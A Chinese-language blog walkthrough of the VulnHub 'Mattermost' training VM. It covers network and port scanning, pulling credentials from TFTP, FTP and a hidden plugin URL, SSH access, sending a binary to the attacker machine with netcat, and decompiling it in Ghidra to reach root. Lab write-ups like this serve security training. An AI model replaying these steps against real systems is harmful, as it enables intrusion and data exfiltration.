行业新闻

vulnhub之mattermost的实践

vulnhub之mattermost的实践

今天实践的是vulnhub的mattermost镜像,下载地址,

https://download.vulnhub.com/enumbox/Mattermost.7z,

用workstation导入成功,先做地址扫描,

sudo netdiscover -r 192.168.137.0/24,

接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.137.53,


浏览器访问一下http://192.168.137.53:8065,需要用户名密码登录,

接下来的事情就比较尴尬了,竟然想到可能有udp的tftp服务,

扫描一下,真有,sudo nmap -sU -p 69 192.168.137.53,

登录,下载文件,tftp 192.168.137.53,

get README.md

quit

cat README.md

得到了用户名密码,Admin/ComplexPassword0!,登录8065的界面,

找到一个zoom插件的地方,使能插件后,得到一个url,

访问这个url,http://192.168.137.53/JK94vsNKAns6HBkG/AxRt6LwuA7A6N4gk/index.html,

得到新的用户名密码,ftpuser/ftppassword,登录ftp,

ftp 192.168.137.53

ftpuser

ftppassword

dir

cd users

dir

cd mattermost

dir

get message

bye

cat message

又获取到新的用户名密码,mattermost/Welcome!!!,

这回能ssh登录,登录进去后发现了提示信息,但执行文件说key过期,

ls

cd Desktop

ls

cat README.md

./secret

想办法把secret文件搞出来,kali攻击机上nc -nlvp 1234 > secret,

靶机上,cat secret | nc 192.168.137.141 1234,

kali攻击机上安装反编译软件ghidra,

sudo apt update,sudo apt install ghidra,

cd /usr/share/ghidra,./ghidraRun,

反编译得到key,0xf447,转成10进制,62535,

这回再执行文件,输入正确的key,id一下确认是root,

关闭